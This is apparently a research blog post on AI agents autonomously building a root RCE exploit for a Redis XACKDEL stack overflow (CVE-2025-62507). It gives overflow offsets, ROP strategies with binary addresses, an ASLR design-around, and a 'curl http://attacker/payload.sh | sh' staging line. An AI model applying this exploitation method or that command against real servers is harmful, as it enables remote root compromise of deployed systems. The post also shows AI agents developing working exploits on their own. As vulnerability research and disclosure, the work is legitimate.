After the OpenSSL run, we had the result we wanted and the doubt that comes with it. One CVE, one successful exploit, one carefully chosen target with the protections turned down. The kind of result where you celebrate for ten minutes and then spend the rest of the evening listing reasons it might not mean anything. Maybe the pipeline got lucky. Maybe the vulnerability was too clean. Maybe the existing public exploits gave the agents too much to work with.

We needed a second target. Something where the public state of the art wasn’t a working RCE with gadget offsets helpfully tabulated in a README - something where the best anyone had published was a crash and a shrug.

We queried the EIP MCP server for recent CWE-121 (stack buffer overflow) CVEs in open-source software with public exploit code - the kind of triage that takes an afternoon of tab-switching when done manually. EIP surfaced a shortlist in under two minutes: CVE-2025-62507 (Redis), CVE-2025-55763 (CivetWeb URI parser overflow), CVE-2026-25968 (ImageMagick stack overflow in MSL attribute handling), CVE-2026-23747 (Golioth Firmware SDK memcpy length issue), CVE-2025-60751 (GeographicLib buffer overflow), CVE-2025-54494 (libbiosig MFER parsing overflow). Redis stood out - highest impact, biggest install base, most interesting gap between CVSS score and public exploit maturity.

The Target

CVE-2025-62507 is a stack-based buffer overflow in Redis 8.2.0 through 8.2.2. CVSS 9.8. The vulnerability is in XACKDEL, a new command introduced in Redis 8.2.0 that atomically acknowledges and deletes stream entries. The only public exploit is a crash PoC and a GDB trace, ending with:

“Still some way to go… another day.”

That was November 2025. Four months later, no one had taken it further. A CVSS 9.8 vulnerability in Redis - one of the most deployed data stores on earth - with no working RCE exploit. The gap between “I can crash it” and “I can execute code” is real, and it’s where most CVEs stall.

The engineering win isn’t the whole point. A disproportionate share of high-severity CVEs in EIP’s database have no public exploit - just a CVSS score, a vendor advisory, and years of silence. Not because they aren’t dangerous, but because proving exploitability requires the kind of sustained effort that doesn’t fit into a sprint. We wanted to know if a pipeline could do what a human researcher hadn’t gotten to yet.

The Bug

The root cause is a copy-paste omission. Redis stream commands follow a boilerplate pattern: allocate a fixed-size stack buffer for stream IDs, and if the caller sends more IDs than the buffer holds, fall back to heap allocation:

streamID static_ids[STREAMID_STATIC_VECTOR_LEN];  // 128 bytes (8 IDs)
streamID *ids = static_ids;
if (args.numids > STREAMID_STATIC_VECTOR_LEN)
    ids = zmalloc(sizeof(streamID) * args.numids);  // heap fallback

Six functions in t_stream.c use this pattern. Five of them have the bounds check. xackdelCommand() doesn’t. The developer copied the cleanup code - if (ids != static_ids) zfree(ids) is present on line 3278, faithfully transplanted from the sibling functions, ready to free a heap allocation that can never actually happen because the allocation guard is missing. The code compiles. The tests pass for 8 IDs or fewer. The cleanup code gives the illusion of completeness. Everything looks right until someone sends 53.

Two lines. That’s the entire vulnerability. And the two-line fix simply adds the missing if statement.

The Overflow Primitive

Stream IDs are parsed as <ms>-<seq> where both fields are unsigned 64-bit integers. Send 53 stream IDs in a single XACKDEL command and the last few overwrite the saved registers and return address. The geometry:

  • IDs 0-7: Fill the legitimate 128-byte static_ids buffer
  • IDs 8-48: Overwrite 656 bytes of local variables
  • IDs 49-51: Overwrite saved RBX, R12, R13, R14, R15
  • ID 52 ms field: Overwrites saved RBP
  • ID 52 seq field: Overwrites the return address - RIP control
  • IDs 53+: Unlimited ROP chain space
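The layout above is plain arithmetic, because each streamID is two 64-bit fields (ms, then seq) and so occupies 16 bytes. A minimal Python sketch of that mapping follows; the function names are illustrative and not part of any tool used in the run, and the offsets are measured from the start of static_ids as in the list above.

```python
STREAM_ID_SIZE = 16  # two uint64 fields per ID: ms first, then seq
FIELD_SIZE = 8


def field_offset(index: int, field: str) -> int:
    """Byte offset from the start of static_ids for ID[index].<field>."""
    if field not in ("ms", "seq"):
        raise ValueError("field must be 'ms' or 'seq'")
    return index * STREAM_ID_SIZE + (FIELD_SIZE if field == "seq" else 0)


def locate(offset: int) -> tuple:
    """Inverse mapping: which ID and field cover an 8-byte-aligned offset."""
    if offset % FIELD_SIZE:
        raise ValueError("offset must be 8-byte aligned")
    index, remainder = divmod(offset, STREAM_ID_SIZE)
    return index, ("seq" if remainder else "ms")


print(field_offset(8, "ms"))    # 128: first byte past the legitimate buffer
print(field_offset(52, "ms"))   # 832: saved RBP slot
print(field_offset(52, "seq"))  # 840: return address slot
print(locate(840))              # (52, 'seq')
```

The same arithmetic gives the 656 bytes of locals: IDs 8 through 48 are 41 entries of 16 bytes each.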

The key insight: because stream IDs are decimal integers parsed via string2ull(), the overflow payload has zero bad characters. An address like 0x000000000044f510 is simply sent as the string "4519184". Full 64-bit range, no null byte restrictions, no encoding constraints. It’s the most favorable overflow primitive you could ask for.
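To make the "zero bad characters" point concrete, here is a small sketch of the round trip: a 64-bit value goes out as decimal text and ends up in memory as eight little-endian bytes, null bytes included. The helper names are hypothetical, and the second function only models the parse-and-store step rather than calling any Redis code.

```python
import struct


def addr_to_field(value: int) -> str:
    """Render a 64-bit value as the decimal text a stream ID field carries."""
    if not 0 <= value < 2**64:
        raise ValueError("value must fit in an unsigned 64-bit integer")
    return str(value)


def field_to_bytes(text: str) -> bytes:
    """Model the result in memory: parse the decimal, store a little-endian uint64."""
    return struct.pack("<Q", int(text))


field = addr_to_field(0x000000000044F510)
print(field)                        # 4519184
print(field_to_bytes(field).hex())  # 10f5440000000000
```

The five trailing zero bytes never appear on the wire; only ASCII digits do.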

There’s a subtlety the agents had to reason through: IDs 8 through 48 overwrite 656 bytes of live local variables - including a streamIterator, loop counters, and other state - while the parsing loop is still running. The function has to survive all 55+ iterations before reaching the ret instruction where RIP control kicks in. The agents figured out that using 0-0 for the padding IDs keeps the overwritten variables zeroed, which doesn’t trigger any premature goto cleanup branches. Wrong padding values and the function crashes inside the loop instead of at the return.

The Missing Canary

One more detail that matters, and it’s the kind of thing that makes you question your assumptions about compiler protections. Redis is compiled with -fstack-protector, which should insert stack canaries into functions with local buffers. The env-setup agent dutifully reported “Stack canary: Enabled” and flagged it as a challenge. Then the crash-poc agent overflowed the buffer and hit RIP directly. No canary check. No __stack_chk_fail. Nothing.

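GCC’s -fstack-protector doesn’t protect every function - only those that call alloca or hold character arrays at or above a small size threshold (8 bytes by default). The streamID static_ids[8] array is 128 bytes, but it is an array of structs rather than a character buffer, so the heuristic passes over it; the broader -fstack-protector-strong would have covered it. The compile flag says “protected.” The disassembly says otherwise: no %fs:0x28 load, no canary verification anywhere in the function. We all learned something that day.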
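The per-function check is easy to script once you have a function's disassembly as text (from objdump -d, for example). The sketch below is an assumption about how such a check could look, not the agents' actual code, and both sample listings are hypothetical rather than Redis output.

```python
import re

# Matches the canary load in AT&T syntax (%fs:0x28) or Intel syntax (fs:0x28, fs:[0x28]).
CANARY_LOAD = re.compile(r"fs:\[?0x28\]?(?![0-9a-fA-F])")
CANARY_FAIL = "__stack_chk_fail"


def has_stack_canary(disassembly: str) -> bool:
    """True if the listing shows a canary load or a __stack_chk_fail call."""
    return bool(CANARY_LOAD.search(disassembly)) or CANARY_FAIL in disassembly


# Hypothetical listings, for illustration only.
protected = """
  mov    %fs:0x28,%rax
  mov    %rax,-0x8(%rbp)
  call   __stack_chk_fail@plt
"""
unprotected = """
  push   %rbp
  mov    %rsp,%rbp
  pop    %rbp
  ret
"""

print(has_stack_canary(protected), has_stack_canary(unprotected))  # True False
```

A binary-level report of "canary enabled" only says that some function in the binary references __stack_chk_fail; a check like this has to be run per function.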

A stack overflow with no canary, no PIE, no RELRO, and 169,441 ROP gadgets in a 17.8 MB binary - including eight different write-what-where primitives (mov [rdi], rax; ret, mov [rdi], rdx; ret, and six more). In Redis. The entire exploit is a single, syntactically valid XACKDEL command sent over the normal RESP protocol. From a network monitor’s perspective, it looks like a normal Redis operation with an unusually high ID count.

Act I: No ASLR

./stackforge start CVE=CVE-2025-62507

The pipeline completed in 68 minutes. Eight phases, all on the first attempt, zero retries. After the OpenSSL run needed eight failed attempts and $100 of prompt education to get right, we’d braced ourselves for another expensive afternoon of reading failure logs. Instead, we watched eight green checkmarks appear in sequence and spent the afternoon doubting whether we’d accidentally left something cached.

The vuln-research agent pulled the CVE brief from EIP, cloned the Redis 8.2.0 source, and found the missing bounds check. Its internal deliberation at that moment:

“Now I can see the vulnerability clearly. The static_ids array holds only 8 streamID entries, but args.numids can be larger without a check - there’s no dynamic allocation when numids > 8. Let me examine more context and look for the parser and similar patterns.”

Unprompted, it then audited all six functions that use the static_ids pattern. Five safe, one vulnerable. It mapped the call chain, identified that XACKDEL requires no authentication (Redis default), and assessed the fix as complete.

The lab-build agent compiled Redis 8.2.0 from source with -fno-pie -no-pie -Wl,-z,norelro, stood up a Docker container, and verified the service was accepting connections on port 6379.

The crash-poc agent sent 53 stream IDs and got SIGSEGV at 0x5c30c0. Its reaction in the logs:

“SIGSEGV confirmed! The server crashes with signal 11 when the return address is overwritten.”

Then it checked whether the stack canary - which checksec had reported as enabled on the binary - actually protected this specific function. It disassembled the epilogue, found no %fs:0x28 reference, no __stack_chk_fail call, and delivered the verdict:

“No stack canary in xackdelCommand! The overflow goes straight to RIP control.”

100% reliable across 3 tests. Crash gate: proceed.

The control-analysis agent mapped the register state with unique marker patterns per position - each marker encoding the register name in its hex pattern for instant visual verification in GDB:

rbp = 0xAAAABBBBCCCCDDDD  ← ID[52].ms
rbx = 0xBBBB000000000049  ← ID[49].seq
r12 = 0xCC12CC12CC12CC12  ← ID[50].ms
r13 = 0xDD13DD13DD13DD13  ← ID[50].seq
r14 = 0xEE14EE14EE14EE14  ← ID[51].ms
r15 = 0xFF15FF15FF15FF15  ← ID[51].seq
RIP = 0x1111222233334444  ← ID[52].seq

Seven registers controlled. But the agent’s logs show it catching its own mistake mid-analysis:

“Wait, there’s a discrepancy - my calculation shows rbx at offset 792 = ID[49].seq, but GDB shows rbx = 49 (which is ID[49].ms). Let me reconcile.”

It had the pop order wrong in the epilogue. It stopped, re-read the disassembly, corrected the mapping, and re-verified every register assignment. The kind of self-correction that matters when one wrong offset means the difference between a shell and a crash. Return address at offset 840 from the buffer start (52.5 stream IDs - ID[52].seq hits RIP exactly). Control gate: proceed.

The exploit-dev agent built three strategies:

| Strategy | Gadgets | Technique | ASLR-Safe? |
|---|---|---|---|
| PLT-based | 4 | pop rdi → libc "/bin/sh"; execve@plt | No |
| Raw syscall | 8 | Write "/bin/sh" to .bss; execve via syscall | Yes |
| Arbitrary command | 14+ | Write command + argv to .bss; execve("/bin/sh", ["-c", cmd]) | Yes |

The first is the simplest: four gadgets, done. But then the agent’s logs show this deliberation:

“I’ll use Strategy 2 (write /bin/sh to .bss then raw syscall execve) since it’s ASLR-independent and more robust.”

Nobody told it about a future ASLR run. Nobody hinted we were planning one. It just decided, on its own, that an ASLR-independent strategy was worth building. Its deliverable noted the rationale: “does not depend on libc addresses (works even with ASLR if binary base is known).” We read that line twice.

The exploit-dev agent’s log entry when the first RCE test came back:

“CODE EXECUTION ACHIEVED! The file /tmp/pwned.txt contains uid=0(root) gid=0(root) groups=0(root), confirming that our ROP chain successfully executed id > /tmp/pwned.txt as root inside the Redis container!”

The validation agent ran 13 tests: 7 core (shell spawning, command execution, multi-command chains) and 6 edge cases (minimum IDs, long commands, pre-existing data). 100% reliability. The exploit executes arbitrary commands as root via a single Redis protocol message.

CVE-2025-62507-RCE-PROOF
uid=0(root) gid=0(root) groups=0(root)

The Numbers (Act I)

| Phase | Duration | Cost |
|---|---|---|
| Vulnerability Research | 14m 42s | $5.27 |
| Environment Setup | 2m 11s | $0.45 |
| Lab Build | 6m 3s | $2.19 |
| Crash PoC | 8m 2s | $2.13 |
| Control Analysis | 9m 48s | $3.12 |
| Exploit Development | 10m 27s | $2.89 |
| Exploit Validation | 13m 16s | $4.33 |
| Report | 4m 2s | $0.76 |
| Total | 68m 32s | $21.13 |

Eight phases, all on the first attempt, zero retries.

Meanwhile, on GitHub: “Still some way to go… another day.”

Act II: ASLR

We didn’t stop there. The whole point of the OpenSSL post was an honest admission: ASLR was off, protections were down, it was easy mode. Could Stackforge handle the real thing?

We made two changes to the pipeline. First, we enabled ASLR in the lab container - randomize_va_space=2, full randomization, no setarch -R wrapper. Second, we added the ability to preseed agents with research from a previous run. The idea: don’t make the agents re-discover the vulnerability from scratch. Give them the non-ASLR PoC, the stack layout, the gadget inventory. Let them focus on the hard part - getting past ASLR.

./stackforge start CVE=CVE-2025-62507 --seed ./seed/ --aslr enabled

The agents consumed the seed research like students who’d done the reading before class. The vuln-research agent confirmed the vulnerability details against the new environment, noting that randomize_va_space=2 was active. The env-setup agent - and this took it about thirty seconds - verified the binary still loaded at 0x400000. No PIE means the binary base is fixed even with full ASLR.

You could almost hear the penny drop: ASLR is irrelevant when the binary has no PIE.

| Memory Region | ASLR Off | ASLR On | Impact |
|---|---|---|---|
| Binary .text / .bss / .got | Fixed 0x400000 | Fixed 0x400000 | None |
| libc | Fixed | Randomized | Breaks Strategy 1 |
| Stack | Fixed | Randomized | Irrelevant (ROP on stack after overflow) |

The non-ASLR exploit’s Strategy 1 pointed RDI at a libc string ("/bin/sh" at 0x7ffff7c7b031). With ASLR, that address moves every run. Dead.

Strategy 2 doesn’t touch libc at all. It uses a three-gadget write pattern - pop rax; ret to load the value, pop rdi; ret to load the target address, mov [rdi], rax; ret to write 8 bytes - repeated for each chunk of data staged into .bss. The chain writes "/bin/sh\0" to 0x7c2dc0, then sets up rdi, rsi=0, rdx=0, rax=59, and hits a raw syscall at 0x4d1355. Every address comes from the binary. ASLR can randomize libc, the stack, and the heap all it wants - none of those addresses appear in the payload.

No information leak. No brute force. No partial overwrite. The agents didn’t bypass ASLR - they designed around it.

The agents also fixed the 240-character command limit from the first run. The non-ASLR exploit staged the command at .bss+16 with the argv[] array at .bss+256 - commands longer than 240 bytes would collide with the argv[0] pointer, whose first null byte truncated the string. The ASLR version separated the regions entirely: "/bin/sh" at 0x7c2dc0, argv[] at 0x7c2e00, command string at 0x7c2e40. No collision possible. Maximum command length: ~2MB, limited only by the 2.3MB .bss section.

The ASLR exploit also dropped the pwntools dependency entirely. Pure Python stdlib - socket, struct, time. The non-ASLR version used from pwn import *; the ASLR version is self-contained.

The preseeding saved real time. Lab-build through exploit-validation took 48 minutes in the first run and 34 minutes in the second - 29% faster. The agents skipped discovery and went straight to adaptation.

The Numbers (Act II)

| Phase | Duration | Cost |
|---|---|---|
| Vulnerability Research | 11m 42s | $2.71 |
| Environment Setup | 0m 30s | $0.10 |
| Lab Build | 10m 18s | $0.71 |
| Crash PoC | 6m 0s | $1.23 |
| Control Analysis | 14m 48s | $4.73 |
| Exploit Development | 13m 48s | $3.54 |
| Exploit Validation | 22m 48s | $3.21 |
| Report | 24m 42s | $6.64 |
| Total | 104m 36s | $22.88 |

Longer than Act I - the control-analysis and validation phases took more time because the agents were re-validating everything against the ASLR environment and running more edge cases. The report phase was unusually long because it incorporated findings from both runs into a single comprehensive writeup.

The exploit works with full ASLR enabled: 10/10 reliability across container restarts (5 command execution, 2 shell spawns, 3 crash/DoS), arbitrary command execution as root, randomize_va_space=2 confirmed active throughout. The validation agent verified the binary base programmatically across restarts:

ASLR Level: /proc/sys/kernel/randomize_va_space = 2 (FULL ASLR ENABLED)
Run 1: 00400000-0044b000 r--p ... /opt/redis/bin/redis-server
Run 2: 00400000-0044b000 r--p ... /opt/redis/bin/redis-server
Binary base address is identical. ASLR affects only libc, heap, and stack  - 
none of which are needed by the exploit's ROP chain.
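A check like the one in that log can be sketched in a few lines of Python: read the process's /proc/<pid>/maps text, keep the lines for the binary, and compare the lowest start address across restarts. The function name is hypothetical, and the sample lines are the two quoted above with their elisions left in place.

```python
def base_address(maps_text: str, binary_path: str) -> int:
    """Lowest mapped start address among lines whose pathname is binary_path."""
    starts = []
    for line in maps_text.splitlines():
        fields = line.split()
        # The address range is the first field, the pathname the last one.
        if len(fields) < 2 or fields[-1] != binary_path:
            continue
        start_hex = fields[0].partition("-")[0]
        starts.append(int(start_hex, 16))
    if not starts:
        raise ValueError(f"{binary_path} not found in maps")
    return min(starts)


path = "/opt/redis/bin/redis-server"
run1 = "00400000-0044b000 r--p ... /opt/redis/bin/redis-server"
run2 = "00400000-0044b000 r--p ... /opt/redis/bin/redis-server"

print(hex(base_address(run1, path)))                         # 0x400000
print(base_address(run1, path) == base_address(run2, path))  # True
```

On a PIE binary the same comparison would fail, because the first mapping would move between runs.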

The 240-Character Discovery

The validation agent found an interesting constraint. The arbitrary command execution mode writes the command string to .bss starting at offset +16, but the argv[] array is constructed at .bss+256. Commands longer than 240 bytes collide with the argv[] pointer - the first null byte of the little-endian pointer truncates the command string.

The validation agent went deep on this one. Its logs show it arguing with itself about byte-level write ordering:

“Wait - 240 chars DOES overlap with argv at bss+256, yet it worked! Let me understand why. The key is the ordering in the ROP chain - argv is written AFTER cmd data.”

It then traced the little-endian byte layout of the argv[0] pointer at the collision boundary to explain exactly why 240 works and 248 doesn’t. Nobody asked it to do this. It just needed to know.
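The 240 figure itself is just the distance between the two staging regions. A short sketch using only the offsets and addresses quoted in this post; the constant names are labels chosen here, not identifiers from the exploit.

```python
def gap(start: int, next_start: int) -> int:
    """Bytes available in a region before the next region begins."""
    if next_start <= start:
        raise ValueError("regions must be in ascending order")
    return next_start - start


# First run: offsets relative to the .bss staging base.
CMD_OFFSET, ARGV_OFFSET = 16, 256
print(gap(CMD_OFFSET, ARGV_OFFSET))  # 240: command bytes before argv[] begins

# Second run: absolute addresses, with the command string placed last.
BINSH, ARGV, CMD = 0x7C2DC0, 0x7C2E00, 0x7C2E40
print(gap(BINSH, ARGV), gap(ARGV, CMD))  # 64 64
```

Placing the variable-length region last is what removes the ceiling: nothing sits after the command string for it to run into.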

The workaround is obvious: staged payloads. Write a script file, then execute it. Or curl http://attacker/payload.sh | sh. Nobody’s using a ROP chain to type a novel.

What the EIP MCP Server Did

The EIP MCP server gave the vuln-research agent the CVE brief, the fix commit hash, the affected version range, and - critically - flagged that the existing public exploits were crash-only. No working RCE to reference. The agent couldn’t lean on someone else’s gadget offsets or payload structure. It had to build from the vulnerability analysis and the binary itself.

For a CVE where the public state of the art was “Still some way to go… another day,” having structured intelligence about what exists (and what doesn’t) told the pipeline exactly how much original work was needed.

What This Means

Two CVEs. Two targets. Two very different vulnerability classes - a library-level ASN.1 parsing bug in OpenSSL and a command handler stack overflow in Redis. Both produced verified RCE. The Redis run needed zero retries across all eight phases. The ASLR run produced an exploit that works with full address randomization.

The OpenSSL run proved the architecture works. The Redis run proved it wasn’t a fluke.

A few things we didn’t expect:

The canary heuristic gap. GCC’s -fstack-protector isn’t a guarantee. Its heuristic looks for alloca calls and character arrays, so a function whose only local buffer is an array of structs doesn’t get a canary. xackdelCommand() has a 128-byte local streamID array and no canary. The agents discovered this by examining the disassembly - no %fs:0x28 load - and correctly identified it as a compiler heuristic quirk, not a configuration error.

The proactive ASLR strategy. The exploit-dev agent in the non-ASLR run, unprompted, developed an ASLR-independent strategy using only binary-internal addresses. When we ran the ASLR version, that strategy was already proven. The seed research handed it over; the ASLR agent just had to verify it still worked.

The ideal overflow primitive. Decimal-encoded unsigned 64-bit integers as the overflow vehicle means zero bad characters, full address range, and unlimited chain length. The agents recognized this explicitly and noted it as “the most favorable overflow primitive possible for ROP exploitation.” They’re not wrong.

The copy-paste irony. The cleanup code if (ids != static_ids) zfree(ids) was faithfully copied from the sibling functions. The security-critical allocation guard was not. The boilerplate survived; the protection didn’t. Two missing lines. Four months of silence. uid=0(root).

What’s Next

Stackforge has now produced verified RCE for two CVEs across two vulnerability classes. The Redis run validated the improvements we made after OpenSSL - binary path validation in preflight, ASLR enforcement, lab prompt hints - and ran clean on the first attempt.

The next frontier is PIE. Both targets so far had no PIE, which means the binary base is fixed and all gadgets are at known addresses. A PIE-enabled binary randomizes the binary itself, not just libc. That requires an information leak - reading an address from the running process to calculate the binary base - before the ROP chain can be constructed. A harder problem. A different kind of agent work. The kind where you can’t just design around the mitigation because there’s nothing left to stand on.

But we said the same thing about ASLR, and then the agents solved it in thirty seconds. So we’ll see.

One CVE number. Zero existing RCE exploits. Nine agents. Sixty-eight minutes. Full ASLR. uid=0(root). Still some way to go… another day - turns out it was today.